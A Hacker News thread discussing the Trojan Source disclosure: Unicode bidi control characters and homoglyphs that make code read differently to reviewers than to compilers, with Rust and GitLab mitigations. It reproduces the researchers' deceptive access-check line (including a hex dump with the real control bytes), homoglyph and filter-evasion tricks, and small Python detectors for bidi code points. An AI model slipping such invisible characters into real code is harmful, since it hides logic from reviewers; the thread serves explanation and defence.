| there's already a couple examples in this comment section why
| it won't be that easy.
| visarga wrote:
| Why is it called a Trojan horse instead of a Greek horse?
| panarky wrote:
| Because the Greeks transferred ownership.
| pitdicker wrote:
| Security advisory for the Rust programming language (with a nice
| explanation): https://blog.rust-
| lang.org/2021/11/01/cve-2021-42574.html
|
| Rust 1.56.1 will be released later today.
|
| > To assess the security of the ecosystem we analyzed all crate
| versions ever published on crates.io (as of 2021-10-17), and only
| 5 crates have the affected codepoints in their source code, with
| none of the occurrences being malicious.
|
| Preview of the new helpful error: https://i.imgur.com/pGpZOnr.png
| robin_reala wrote:
| That's a really impressively written error message.
| sodality2 wrote:
| That's one of Rust's selling points. For all I've used the
| rust compiler, not once have I ever not known what error it
| was pointing out: its error messages are incredibly helpful.
| Occasionally I am unsure _why_ it's an error, but I always
| know what it's referring to and what I could do to fix it.
| Timwi wrote:
| I've had the same experience with C#. The error messages
| always state exactly what's wrong and where in the code
| it's wrong. Many of them (especially compiler _warnings_
| intended to point out syntax that is almost certainly a
| bug) also tell you how to fix it (e.g. "consider using
| 'new' keyword if hiding was intended").
| hermitdev wrote:
| Personally, I don't know why the last one ("consider
| using 'new' keyword if hiding was intended") isn't an
| error by default in C#. Not overriding the base method
| is almost always a mistake, and if it's not a mistake,
| better to be explicit about it, anyways. My $.02...
| joosters wrote:
| Their advisory is well-written and explains the problem well.
| The example code they use:
|
|     if access_level != "user" { // Check if admin
|
| opens up a whole can of worms though. You don't need cunning
| invisible control codes to break that line, you could just
| replace any of the letters in 'user' with a different, but
| almost-identical looking unicode symbol and you'd still have an
| exploit. Even better, this would be a completely deniable
| attack ("oops, I must have accidentally pressed alt-R while
| typing that letter" excuse) - whereas explaining away why you
| checked in some magical RTL/LTR encodings and hacked up a
| comment is impossible. Plus, it would render well in far more
| apps, terminals, command line programs, etc etc
| codesections wrote:
| > you could just replace any of the letters in 'user' with a
| different, but almost-identical looking unicode symbol and
| you'd still have an exploit.
|
| The post mentions that exploit (and Rust's already existing
| defense) in the appendix.
|
| Here are the details, as explained in a previous post:
|
| > The compiler will warn about potentially confusing
| situations involving different scripts. For example, using
| identifiers that look very similar will result in a warning.
|
|     warning: identifier pair considered confusable between `s` and `s`
|
| https://blog.rust-lang.org/2021/06/17/Rust-1.53.0.html
| joosters wrote:
| _The compiler will warn about potentially confusing
| situations involving different scripts. For example, using
| identifiers that look very similar will result in a
| warning._
|
| Unfortunately, I've little experience of rust, so I don't
| have experience of that warning. It would certainly help
| catch a one-liner exploit, but wouldn't it be excessively
| noisy for code written in non-english languages?
| wongarsu wrote:
| It only warns if there actually are two identifiers that
| look similar. Even if it's not malicious it's still
| confusing and is worth renaming.
|
| But if you want to, turning off specific warnings for a
| file or block of code is really simple in rust, just add
| "#[allow(confusable_idents)]"
| estebank wrote:
| The Unicode homoglyph lint will only trigger if there are
| multiple identifiers that can look the same, it's not a
| blanket warning on anything that isn't ASCII. It's close
| to what browsers do with domain names. And you can always
| allow lints.
| lol768 wrote:
| Am I missing something here? The spacing around these
| homoglyphs is _almost always_ noticeably wider than it
| should be, such that I don't understand how you could ever
| miss it in any half-decent code review.
| if access_level != "user" { // Check if admin
| if access_level != "user" { // Check if admin
|
| Come on, that looks _obviously_ off.
| nonameiguess wrote:
| If you were really reviewing that code, Rust has
| algebraic data types, and access level should be an Enum,
| not a String.
|
| But it's their example. The problem isn't with
| homoglyphs, though. It's with bidi control characters,
| which are invisible to a human but not to the compiler,
| which is how generated code can end up semantically
| different from source code, which is the actual problem
| here. What you see in code review would be the first
| line, even though that isn't actually what is in the
| source, because an editor that is bidi-aware would show
| it that way.
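|
| To make the invisible characters concrete, here is a sketch
| that scans for the nine bidi control code points (U+202A to
| U+202E and U+2066 to U+2069) and swaps each for a visible
| marker. The sample line is modeled on the advisory's example;
| find_bidi_controls and reveal are hypothetical helper names.

```python
# The explicit bidi embedding, override and isolate controls.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF",
    "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}


def find_bidi_controls(source):
    """Yield (line, column, abbreviation) for each bidi control in source."""
    for line_no, line in enumerate(source.split("\n"), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                yield line_no, col, BIDI_CONTROLS[ch]


def reveal(source):
    """Replace each control with a visible <ABBR> marker for review."""
    return "".join(f"<{BIDI_CONTROLS[ch]}>" if ch in BIDI_CONTROLS else ch
                   for ch in source)


line = 'if access_level != "user\u202e \u2066// Check if admin\u2069 \u2066" {'
print(list(find_bidi_controls(line)))
print(reveal(line))
```

| The revealed form shows that the comment text sits inside the
| string literal, which is what the compiler sees.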
| steveklabnik wrote:
| > But it's their example
|
| It's the example that the researchers provided to us, to
| be clear about it.
| hug wrote:
| I think that it is possible that you are missing a fairly
| important point.
|
| ... And that point is that none of the vowels in my
| previous sentence are latin, I guess.
| mkl wrote:
| I think you missed some. I can't seem to paste your fake
| "i"s back in, but here's what I see:
|
|     $ xxd
|     I think that it is possible that you are missing a fairly important point.
|     00000000: 4920 7468 d196 6e6b 2074 68d0 b074 20d1  I th..nk th..t .
|     00000010: 9674 20d1 9673 2070 6f73 73d1 9662 6cd0  .t ..s poss..bl.
|     00000020: b520 7468 d0b0 7420 796f 7520 d0b0 7265  . th..t you ..re
|     00000030: 206d 6973 7369 6e67 20d0 b020 66d0 b0d1   missing .. f...
|     00000040: 9672 6c79 2069 6d70 6f72 7461 6e74 2070  .rly important p
|     00000050: 6f69 6e74 2e0a                           oint..
| hug wrote:
| Made you look. :)
|
| I also skipped a bunch of the "I"s.
| mkl wrote:
| Yes. What browser did you use to make the comment? I
| can't get all those characters to paste in.
| hug wrote:
| Firefox 93.0 on Windows 11. Characters copied & pasted
| from charmap.exe
|
| a: U+0430 "Cyrillic small letter a"
|
| e: U+0435 "Cyrillic small letter e"
|
| i: U+0456 "Cyrillic small letter Byelorussian-Ukrainian i"
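|
| A toy version of a confusable check built from just these three
| letters. The LOOKALIKES table is hand-made for illustration; a
| real checker would need the full Unicode confusables data,
| which this sketch does not attempt to reproduce.

```python
# Hand-made table covering only the three Cyrillic letters listed above.
LOOKALIKES = {"\u0430": "a", "\u0435": "e", "\u0456": "i"}


def skeleton(text):
    """Map each known lookalike to its Latin counterpart."""
    return "".join(LOOKALIKES.get(ch, ch) for ch in text)


def is_spoof_of(candidate, trusted):
    """True if candidate differs from trusted but matches it after mapping."""
    return candidate != trusted and skeleton(candidate) == trusted


print(is_spoof_of("us\u0435r", "user"))  # Cyrillic U+0435 in place of "e"
print(is_spoof_of("user", "user"))
```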
| est31 wrote:
| > warning: identifier pair considered confusable
|
| Note that the lint you mention is about _identifiers_,
| while "user" is a literal. The lint does not fire for
| literals. String literals have always supported non ascii
| characters since 1.0.0, and there has never been a lint for
| them, until now with the 1.56.1 release.
| estebank wrote:
| Also worth noting that the homoglyph attack _isn't_
| linted for in literals or comments, only the bidi
| codepoints are.
| _3u10 wrote:
| This stuff has always been there; consider this code:
|
|     if (uid = NULL) { // Check if root
|
| And if you're using clang:
|
|     if ((uid = NULL)) { // Check if root
|
| I'd venture that this is far more dangerous than unicode in
| strings...
|
| or how about:
|
| strcpy()
|
| or #include anything with a #DEFINE
| [deleted]
| fstrthnscnd wrote:
| > if (uid = NULL) { // Check if root
|
| That's not the same class of error, since here a programmer
| can _see_ the issue by simple inspection.
|
| > or #include anything with a #DEFINE
|
| This one perhaps is closer to the mark, although not based
| on unicode.
| _3u10 wrote:
| To me it's the same class of error which is convincing
| humans and other automated tests that your code is OK
| when it isn't.
|
| I dealt with a bug that only appeared in release builds,
| and never in debug. The offending code looked roughly
| like this:
|
|     if (blah)
|     #ifdef DEBUG
|         baz();
|     #endif
|     bar();
|
| The systemic problem was it was a project created by
| interns, and they'd review each other's code. By the time
| the bug got to me the interns had left and a Sr Dev had
| spent a day looking for the bug. It took me an hour to
| find it. In isolation it's easy to see but in the mess of
| all the other code, you really have to look for these
| things.
| capitainenemo wrote:
| Rust doesn't allow assignment in conditionals.
|
| https://locka99.gitbooks.io/a-guide-to-porting-c-to-
| rust/con...
| _3u10 wrote:
| It does; in fact, the article you posted shows you
| exactly when rust allows assignment in conditionals.
|
| As long as you're initializing a variable, it's allowed,
| if you're not initializing you'll have to use a block
| expression.
| capitainenemo wrote:
| Should have just used this sentence - which also directly
| covers parent's case.
|
| "Rust does not allow assignment within simple expressions
| so they will fail to compile. This is done to prevent
| subtle errors with = being used instead of ==."
|
| Better?
| ace112 wrote:
| Ooh, or you could just put in the cyrillic 'a' and even have
| it look like it's legit :)
| smsm42 wrote:
| > Cambridge research clearly shows that most compilers can be
| tricked with Unicode into processing code in a different way than
| a reader would expect it to be processed.
|
| Unless I misunderstand the premise, this is not right. The
| compiler is not "tricked" into doing anything different - it
| interprets the code the same way as it always did. It's like
| saying "rm" command "can be tricked into" deleting important
| files. The rm tool doesn't know which files are important to you,
| and the compiler doesn't - and shouldn't - know what you consider
| to be "correct" code. It would correctly compile any code that is
| syntactically correct - if there are strings inside that look
| weird to you, it doesn't matter to the compiler.
|
| The entity that can be "tricked" here is the reviewer of the code
| - who, indeed, might be tricked into accepting code that does
| something different than they'd think it does (though it'd
| require a very clever attacker for the code to both do
| something nefarious with Unicode and still look innocent and not
| weird to the reviewer). Fortunately, this is quite easy to fix -
| just don't accept any patches with source code that have any non-
| ASCII outside small set of localization resources (proper code
| would have localizable resources outside the code anyway, tbh)
| and no Unicode would ever trick you.
| __alexs wrote:
| > Fortunately, this is quite easy to fix - just don't accept
| any patches with source code that have any non-ASCII outside
| small set of localization resources
|
| There are plenty of projects out there written by people who
| aren't English speakers who depend on the Unicode capabilities
| of languages to write code that is actually readable to them.
| Turning that off is far from a solution.
| smsm42 wrote:
| Can you give an example? I've never seen a project (outside
| domains on APL, etc.) that seriously relied on any Unicode
| capabilities in the code itself (again, I am not talking
| about localized strings). My native language is not English,
| I've worked with people all over Europe, China, India, Japan,
| Israel, etc. - there are a lot of exciting i18n/l10n problems
| but I have never seen much of what a compiler would need to
| be concerned with.
| ivanhoe wrote:
| Does anyone actually do that in a production code?
|
| I myself am not native English speaker and use unicode when
| writing in my mother tongue, but in 20+ years of programming
| I've never seen anyone using non-ascii chars in their
| professionally written code? Of course, you use the language
| in localization files, and perhaps in comments occasionally -
| especially in TODO stuff that's not meant to be permanent -
| but not in the actual code, like e.g. for a variable or
| function names.
|
| I'd actually consider it a bad idea, as it limits
| significantly who can manage that code in the future.
| fstrthnscnd wrote:
| > Does anyone actually do that in a production code?
|
| Would you accept teaching code as production code?
| Specifically, if you were to teach programming to young non
| English speakers, wouldn't you accept them to use words of
| their native tongue for variables and such?
|
| > I'd actually consider it a bad idea, as it limits
| significantly who can manage that code in the future.
|
| Wouldn't you say that solely using roman letters in code
| would impose a similar limit? In countries where these
| letters are seldom used (like for instance greek letters in
| western countries), only those accustomed to them would be
| able to handle code (as it has been the case until the last
| decade perhaps).
| Cthulhu_ wrote:
| It's a very western / Anglosphere attitude, and I think you
| underestimate how much code is produced in e.g. China and
| Japan nowadays, with comments in their native language.
|
| How would you name a FooBarWicket if you don't speak a word
| of English?
|
| I mean don't get me wrong, ideally everybody writes code in
| perfect English and sticks to a set of ~50 ascii
| characters, but it's not an ideal world and you have to
| keep other languages and cultures in mind.
| Aeolun wrote:
| > How would you name a FooBarWicket if you don't speak a
| word of English?
|
| How would you learn how to make a FooBarWicket without
| knowing a word of English? Any programming languages
| control constructs are almost by definition English.
| ivanhoe wrote:
| Well, what you call an Anglosphere attitude is a reality
| of learning in a majority of non-english speaking
| countries: There's simply not enough resources for
| learning in your own language.
|
| China is huge so I can see how it could work for them,
| but I still have to admit it's very hard for me to
| imagine someone becoming say a competent web dev without
| picking at least some basic English along the way, so
| they can handle at least the documentation and stay in a
| loop on new tech coming out all the time. It's not
| anything new as a concept, nor do I see it as damaging for
| local cultures in any way - back in my University days
| I taught myself some Russian so that I could read
| their physics and chemistry books which were excellent
| and way cheaper and easier for me to get than those from
| the West. One day I'll have no problem learning some
| Chinese if (or more likely when?) they become the
| reference source of knowledge.
| __alexs wrote:
| > China is huge so I can see how it could work for them,
| but I still have to admit it's very hard for me to
| imagine someone becoming say a competent web dev without
| picking at least some basic English along the way,
|
| Having worked with some large software teams in China my
| experience was that most people could speak a bit of
| English (but generally didn't want to) and were nowhere
| near at the level needed to actually design and write
| software in English.
|
| If we forced them to do everything in English quality was
| terrible and everything took ages, but if we let them
| write in Mandarin things were much better.
| notJim wrote:
| > it's very hard for me to imagine someone becoming say a
| competent web dev without picking at least some basic
| English along the way, so they can handle at least the
| documentation and stay in a loop on new tech coming out
| all the time.
|
| Why would they need to learn English to do those things?
| I'm sure there are Chinese-language tech news sites, and
| Chinese-language documentation.
| jrochkind1 wrote:
| Agreed, but I'm still curious (and don't know the answer)
| how often someone actually needs to put a "Bidi override"
| in a comment... if I were a language designer I'd be
| tempted to just say they aren't allowed in comments or
| identifiers or anywhere but string literals/data, and
| have the compiler/interpreter just reject it.
|
| (I have used a bidi override before myself, for non-
| malicious purposes!)
| amenod wrote:
| I would argue that even if you decide that you are using
| some other language and not English, there is only a
| well-defined subset of Unicode characters that should
| ever be allowed in the codebase. Bidi override control
| characters are clearly not among them, whichever language
| you choose.
| chmod775 wrote:
| > there is _only_ a well-defined subset of Unicode
| characters that should _ever_ be allowed in the codebase
|
| It's not even remotely well-defined, and probably never
| will be. Also, as long as we keep adding to unicode, you
| will need to keep your whitelist of code points updated.
|
| You can however find _a_ well-defined subset of
| characters that can be allowed.
|
| In either case you'd be essentially excluding entire
| languages.
| amenod wrote:
| You misunderstood my point:
|
| >> There is only ... that _should_ ever be allowed...
|
| What I am saying is that if someone decides to code in a
| non-English language (which is completely reasonable) they
| _should_ define a subset of unicode characters that is
| acceptable. Additionally, the allowed characters should
| not permit tricks like these.
|
| As for excluding entire languages... well, yes. This is
| already the case today. But OTOH it's not like
| understanding what "if" means gives you any special
| advantage in programming.
| rbanffy wrote:
| > Bidi override control characters are clearly not among
| them, whichever language you choose.
|
| Not sure how would you write a comment in an RTL human
| language in the middle of LTR code without it. Lots of
| people learn to write RTL languages well before writing any
| code.
|
| What compilers can do is to process those characters and
| assign them semantic value that makes the code equivalent
| to what is expected to be rendered.
|
| Now, bidi overrides in identifier names is a nightmare
| I'd prefer to avoid.
| amenod wrote:
| The same way as you write a comment in a LTR human
| language in the middle of RTL code - you don't. You stick
| to either LTR or RTL. This is code, not prose.
| WalterBright wrote:
| > Not sure how would you write a comment in an RTL human
| language
|
| Siht ekil.
| jrochkind1 wrote:
| You do not actually need the bidi override control
| character to put a comment in an RTL language in the
| middle of LTR code.
|
| You only need it if you are doing this, and the default
| Unicode algorithm for guessing LTR/RTL boundaries gets it
| wrong, so you need to override with an explicit bidi
| override control. I'm not even sure how feasible that is
| to do in the editor/IDE environments that developers with
| this use case might use.
|
| I am genuinely curious how often these sorts of
| situations come up in actual development.
|
| > What compilers can do is to process those characters
| and assign them semantic value that makes the code
| equivalent to what is expected to be rendered.
|
| I don't understand what you mean or how that's even
| possible, for the kinds of attacks discussed in OP.
| jrochkind1 wrote:
| Btw here's proof. Here is ltr text and rtl `ibriyt text
| `rby interspersed with no bidi override control
| characters to be found.
|
| Unicode can handle this, it has a heuristic algorithm for
| it. Note how if you try to select the text character-by-
| character, your selection does funny things at the rtl to
| ltr boundaries, because the byte order doesn't match the
| order on the screen. It really is handling the
| directionality changes, with the letters entered in
| "order" across changes, there is no funny entry or
| ordering going on, this is plain old normal unicode
| handling interspersed directionality changes just fine,
| with no bidi overrides.
|
| It just sometimes gets it wrong for the intent of the
| author. Especially when there are characters at the
| boundaries that are themselves not strongly associated as
| rtl or ltr (like ordinary "western arabic numerals" or
| punctuation). That's what the bidi override control char
| is for.
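|
| The "strong" versus "not strongly associated" distinction can
| be inspected directly: every code point carries a bidi class,
| which Python exposes through unicodedata.bidirectional. A small
| sketch, with sample characters chosen for illustration:

```python
import unicodedata

samples = {
    "a": "Latin letter",
    "\u05d0": "Hebrew letter alef",
    "\u0639": "Arabic letter ain",
    "7": "digit",
    "!": "punctuation",
    " ": "space",
    "\u202e": "right-to-left override",
}

# Map each sample character to its Unicode bidi class.
classes = {ch: unicodedata.bidirectional(ch) for ch in samples}

for ch, label in samples.items():
    print(f"U+{ord(ch):04X} {label}: {classes[ch]}")
```

| Letters come out as strong classes (L, R, AL), while digits,
| punctuation and spaces get weak or neutral classes (EN, ON, WS)
| whose direction depends on their neighbours. Those are the
| cases where the heuristic can guess wrong.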
| dmz73 wrote:
| When you code for yourself, write what you want. If you
| write to collaborate then use English/ASCII. Imagine
| international aviation if they allowed the same BS that
| people in IT allow and now even try to promote - everyone
| talking their own language and not understanding each
| other - we would have planes colliding and crashing all
| over the place.
| Aeolun wrote:
| We used to have that, with exactly the result you
| describe. Which is why it was changed.
|
| We'll get there eventually with software, but it
| generally doesn't kill people so there's less incentive.
| wizzwizz4 wrote:
| Aviation requires real-time communication; it's not a
| great analogy, I don't think.
| worrycue wrote:
| I still wonder though, just how much production non-
| comment source code is not written in the ASCII character
| set.
|
| The libraries of most programming languages (developed in
| the west) are in ASCII - frameworks and middleware too.
| Have people in countries like Japan and China actually
| translated all of that code - renaming functions,
| classes, and variable names to their native tongue in
| Unicode - or do they just learn the English names (they
| are all nouns/pronouns and at most simple phrases so
| translation should not be too difficult; they don't have
| to understand English grammar).
| Moru wrote:
| Microsoft translated all the commands in the scripting
| language for Excel into each native language, making it totally
| impossible to use for anyone. You can't even google it
| because the help is so split up in different languages.
| Zababa wrote:
| Not only the commands, the separator too. In some
| languages, it's FUNCTION(arg1, arg2), in some others it's
| FONCTION(arg1; arg2)
| Bayart wrote:
| I've definitely seen it done, in both code I was adjacent
| to and code I was pulling from outside. I have vivid
| memories of stumbling on a lib doing seemingly what I
| needed but with all comments in Chinese and variables/funcs
| in Pinyin.
| Piskvorrr wrote:
| I can attest that it happens, even in (natural) languages
| that use Latin scripts. Sure, "just use en.US-ASCII" is a
| mitigation, and most (Euroamerican) code follows this; the
| bug extends to string literals however ("they don't end
| where you see them // this is actually not part of the
| string; return;"), so a different approach is needed.
| Const-me wrote:
| Professionally made GUI software needs Unicode even when
| English localized, for typography.
|
| Proper quotes, proper dashes (ASCII doesn't have a dash
| character, it only has minus), non-breakable space, soft
| hyphen, € character, Greek letters like π and μ, etc.
| jdavis703 wrote:
| Most of these should be in a separate file for i18n, not
| directly in the source code.
| Const-me wrote:
| Internationalization is not limited to putting strings into a
| resource table. It also needs a non-trivial amount of code.
| Printing numbers into strings is code, not data. Yet if you
| want the numbers to look good, like "600 μm" or "6×10⁻⁴
| meters", you're going to have Unicode in code, not in the
| resources.
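|
| As a sketch of why this ends up in code: rendering a number
| with a real multiplication sign and superscript exponent takes
| logic, not just a lookup. The function name sci is hypothetical
| and the non-ASCII characters are written as escapes so the
| source itself stays ASCII.

```python
# Translation table from "-0123456789" to the matching superscript characters.
SUPERSCRIPTS = str.maketrans(
    "-0123456789",
    "\u207b\u2070\u00b9\u00b2\u00b3\u2074\u2075\u2076\u2077\u2078\u2079",
)


def sci(value, digits=0):
    """Format value as mantissa, multiplication sign, 10 and a superscript exponent."""
    mantissa, exponent = f"{value:.{digits}e}".split("e")
    power = str(int(exponent)).translate(SUPERSCRIPTS)
    return f"{mantissa}\u00d710{power}"


print(sci(6e-4) + " meters")
print(sci(1500, digits=1))
```

| Writing the symbols as escapes is one compromise: the output
| is typographically correct while the file remains reviewable as
| plain ASCII.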
|
| Another thing, not every software needs i18n. Depends on
| the market. I'm yet to see a C++ compiler which would
| localize their output messages.
| jdavis703 wrote:
| "Meters" is an English word, and a string like "600 mm"
| should still probably be extracted from the code as "%d
| mm."
| Const-me wrote:
| Still, there are also strings like "6*10-4"
| kzrdude wrote:
| GCC supports localization, that's one C++ compiler.
|
| Intel C++ compiler seems to have a Japanese version (not
| tried).
| [deleted]
| klohto wrote:
| You argue away your own fix. The proposed fix is as if rm were
| limited to files outside of /sys; plenty of projects depend on
| the standardized behavior.
| Sebb767 wrote:
| > The rm tool doesn't know which files are important to you,
| and the compiler doesn't - and shouldn't - know what you
| consider to be "correct" code.
|
| This is actually no longer true. Many rm implementations today
| refuse to recursively delete the root directory itself unless
| you explicitly specify `--no-preserve-root`. Similarly,
| a lot of compilers tend to warn you or outright stop if they
| detect code that is very likely to be buggy - the rust compiler
| warning about these control characters is just the latest
| example.
|
| Of course, in theory, each tool should do its job and the user
| should be the boundary to know what's right. In practice,
| though, these heuristics tend to catch bugs-to-be 95% of the
| time (at least in my experience) and are easily disabled
| otherwise, so they are good to have.
| wizzwizz4 wrote:
| I couldn't care less about my root directory. The only things
| I care about are the motherboard firmware and the /home
| directory, and nothing prevents `rm` from deleting those.
|
| The `--one-file-system` or `--preserve-root=all` flags are
| more useful than `--preserve-root`, but they're not defaults.
| (For a good reason: compatibility.)
| robin_reala wrote:
| APL developers would disagree.
| edent wrote:
| BDI can be used to evade profanity filters. Writing something
| like `‮kcuf` will display a banned word.
|
| Does it work here?
|
| > I am an toidi
|
| No? HN strips the BDI.
|
| But there are plenty of other systems which display weird RTL
| behavior.
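|
| A sketch of why a substring filter misses this, using a mild
| placeholder word. The word list and both filter functions are
| hypothetical, and flagging every override is only one assumed
| policy, not how any particular site does it.

```python
RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE
BANNED = {"idiot"}  # placeholder word list


def naive_filter(message):
    """Flag a message only if a banned word appears in logical (stored) order."""
    return any(word in message.lower() for word in BANNED)


def stricter_filter(message):
    """Also flag any message that contains the override character (assumed policy)."""
    return RLO in message or naive_filter(message)


# Stored reversed, but shown in reading order by a bidi-aware renderer.
sneaky = "I am an " + RLO + "toidi"
print(naive_filter(sneaky), stricter_filter(sneaky))
```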
| lokedhs wrote:
| Yes, Mastodon has recently been discussing this.
| https://github.com/mastodon/mastodon/issues/2777
| im3w1l wrote:
| I remember bringing this up many years ago. Yes specifically
| making code seem like comments using bidi. I'm just a little bit
| salty I won't get the credit.
|
| https://bugs.eclipse.org/bugs/show_bug.cgi?id=339146
| ComodoHacker wrote:
| The paper: https://www.trojansource.codes/trojan-source.pdf
| robotmay wrote:
| This was a pretty interesting thing to mitigate - we added some
| support around it to GitLab after it was reported to us, which
| shipped in the latest security release:
| https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...
| (you can actually see it in effect on that commit's examples,
| which is quite meta). These characters have valid use-cases in
| right-to-left languages like Arabic, Japanese etc, so it had to
| be configurable for project-owners if they have legitimate use-
| cases for it. Our focus was on making sure that repository
| maintainers could see these characters in code reviews.
|
| The homoglyph attack is interesting but it really should be
| noticed as part of a code review process, as it requires adding
| the imitation function calls at some point too. It'd also likely
| be pretty frustrating to end users if we were to highlight every
| single unicode character that looks like the latin alphabet.
|
| It's certainly a good lesson in not copy/pasting random snippets
| from the internet and pasting them into a root shell, however :D
| (we do always highlight the bidi characters on GitLab snippets,
| though)
|
| Aside: this was a royal pain in the arse to figure out if I had
| live examples in the specs, because vim also just rendered them
| "correctly". I ended up checking the files in Windows Notepad on
| another machine to sanity check them.
|
| Thanks to the authors for responsible disclosure.
| charcircuit wrote:
| >These characters have valid use-cases in right-to-left
| languages like Arabic, Japanese etc,
|
| I've never seen it used for Japanese. I don't think there is a
| valid use case for Japanese.
| robotmay wrote:
| Ah yes you're right - looks like that can be handled with
| CSS: https://www.w3.org/International/articles/vertical-
| text/. Although from what I've seen most Japanese websites
| tend to be left-to-right instead anyway.
|
| Hebrew would be a more valid second example I think. I'd be
| curious to know how many languages maintain their RTL
| preference online.
| dhosek wrote:
| Japanese[1] isn't a right to left language, exactly. It can
| be written horizontally, in which case it's L-R, top to
| bottom, or, vertically, in which case it's top to bottom,
| with columns running R-L, but functionally, this is still
| like L-R typesetting, just with the characters rotated
| 90° CCW and the pages are then read in the same order as
| pages in a R-L book. This is typical of manga which is why
| there might have been confusion by the OP about the
| directionality of Japanese.
|
| [1] All of this also applies to Chinese and Korean.
| Interestingly, traditional Mongolian script is also written
| vertically, but in columns left to right rather than right
| to left.
| capitainenemo wrote:
| This doesn't feel particularly new either? Isn't it pretty much
| a new variant of https://github.com/reinderien/mimic ?
|
| Which, if one is suspicious of code, can be defeated in vim
| with: set encoding=latin1
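|
| The same idea outside vim, as a rough sketch: reinterpret the
| file's UTF-8 bytes as Latin-1 so every multi-byte character
| turns into visibly wrong text. The helper name as_latin1 is
| made up for this example.

```python
def as_latin1(text):
    """Reinterpret the UTF-8 bytes of text as Latin-1, one character per byte."""
    return text.encode("utf-8").decode("latin-1")


print(as_latin1("user"))        # pure ASCII is unchanged
print(as_latin1("us\u0435r"))   # Cyrillic U+0435 becomes two odd characters
```

| Pure ASCII passes through untouched, so anything that changes
| is worth a second look.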
| specialist wrote:
| > _It's certainly a good lesson in not copy/pasting random
| snippets from the internet..._
|
| For someone with more gumption than me:
|
| Future copy & paste will by default have intermediate screenshot
| and OCR steps. Voila: charset scrubbing for free.
|
| Why not? Already today misc UIs and renderings disallow text
| selection. Drives me nuts.
| kevin_thibedeau wrote:
| This is too complicated for a personal supercomputer to be
| burdened with. Better to ship everything on the clipboard to
| a sanitizer service.
| modeless wrote:
| The future is now. Android has been doing this for years and
| it's awesome. There's no text you can't copy.
|
| To clarify, by default copy and paste works the normal way,
| but you can open the app switcher to use the OCR copy/paste
| which works on non-selectable text too, even in images.
| QuercusMax wrote:
| There's a way to prevent this - to my great annoyance,
| health apps (such as the ubiquitous MyHealth variants) and
| banking apps can prevent you from taking screenshots or
| copying text. This is presumably to prevent screen-scraping
| apps from stealing your private data, but it's really
| annoying when you're trying to screenshot a QR code for
| some kind of check-in process.
| checkyoursudo wrote:
| That's why you need a second phone to photograph the
| screen of the first phone.
| lelandbatey wrote:
| I was impatient to find the example you were talking about; as
| far as I can tell, this is the line with the example:
| https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...
|
| And here's what it looks like in various conditions/viewers:
|
| With the fix, this is how it looks in the browser in the Gitlab
| interface:
|
|     if (accessLevel != "user") { // Check if admin
|
| Without the fix, viewed raw (and thus viewed in a vulnerable
| way), it looks like this:
|
|     if (accessLevel != "user") { // Check if admin
|
| And in a hex viewer, it looks like this:
|
|     000005b0: 2020 2020 2020 2069 6620 2861 6363 6573         if (acces
|     000005c0: 734c 6576 656c 2021 3d20 2275 7365 72e2  sLevel != "user.
|     000005d0: 80ae 20e2 81a6 2f2f 2043 6865 636b 2069  .. ...// Check i
|     000005e0: 6620 6164 6d69 6ee2 81a9 20e2 81a6 2229  f admin... ...")
|     000005f0: 207b 0a20 2020 2020 2020 2020 2020 2020   {.
|     00000600: 2063 6f6e 736f 6c65 2e6c 6f67 2822 596f   console.log("Yo
|     00000610: 7520 6172 6520 616e 2061 646d 696e 2e22  u are an admin."
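|
| For anyone who wants to poke at those bytes, here is a minimal
| Python sketch that decodes the relevant part of the hex dump above
| and lists the bidi control characters in it. The set of code
| points and the helper name find_bidi_controls are my own choices
| for illustration, not something taken from the Gitlab fix.

```python
import unicodedata

# Explicit bidirectional formatting characters (embeddings, overrides, isolates).
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI
}


def find_bidi_controls(text):
    """Return (offset, code point, Unicode name) for each bidi control in text."""
    return [
        (i, f"U+{ord(ch):04X}", unicodedata.name(ch))
        for i, ch in enumerate(text)
        if ch in BIDI_CONTROLS
    ]


# Bytes transcribed from the hex dump, starting at "if (" and ending at "{".
raw = bytes.fromhex(
    "69 66 20 28 61 63 63 65 73 73 4c 65 76 65 6c 20 21 3d 20 22 75 73 65 72 "
    "e2 80 ae 20 e2 81 a6 "
    "2f 2f 20 43 68 65 63 6b 20 69 66 20 61 64 6d 69 6e "
    "e2 81 a9 20 e2 81 a6 22 29 20 7b"
)
line = raw.decode("utf-8")

for offset, codepoint, name in find_bidi_controls(line):
    print(offset, codepoint, name)
```

| It reports four controls: a right-to-left override, then an
| isolate, a pop, and another isolate, which is what makes the
| closing quote and paren render somewhere other than where they
| sit in the file.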
| Antwnis wrote:
| That's a great example ^ that demonstrates exactly how this
| vulnerability can be easily abused
| smashed wrote:
| I was intrigued by your meta example and I took a look. It took
| me 3-4 minutes to find the warning, and I was looking for it!
|
| I was expecting a big fat warning on the merge request itself,
| or maybe on the lines containing the dangerous chars.
|
| In the end, it is a small ? character inserted where the Unicode
| control chars are, and a mouseover tooltip warning about a
| potential issue.
|
| The warning is good, but why so subtle? Sorry for the
| criticism. The feature is still a huge positive.
| robotmay wrote:
| Thanks for the feedback! Our primary use-case when deciding
| on it was to flag these up in a code-review situation, to
| prevent malicious content being submitted in merge requests
| to unsuspecting projects. We found this made it stand out
| enough to the reviewer when performing code reviews. I also
| try to not be too quick to add new alerts or sections to the
| GUI as we sometimes get criticised for having too much
| clutter D:
|
| GitHub by comparison went down the alert banner route, from
| what I can see. I'm not opposed to adding something to that
| effect as well though - especially for inexperienced
| reviewers, it would be nice to include some more information
| about the potential exploit. That could be something we
| revisit when we add the homoglyph highlighting.
| slim wrote:
| > this was a royal pain in the arse to figure out if I had live
| > examples in the specs, because vim also just rendered them
| > "correctly"
|
| That's because vim supports Farsi/Arabic natively from day one.
| Even if the OS does not support it, you can still write
| bidirectional and right-to-left text in vim. Never knew the
| reason, but thanks Bram Moolenaar.
| stackbutterflow wrote:
| > It's certainly a good lesson in not copy/pasting random
| snippets from the internet and pasting them into a root shell,
| however
|
| I gotta say that I always make sure that I understand each
| piece of code that I copy paste but I do copy paste and never
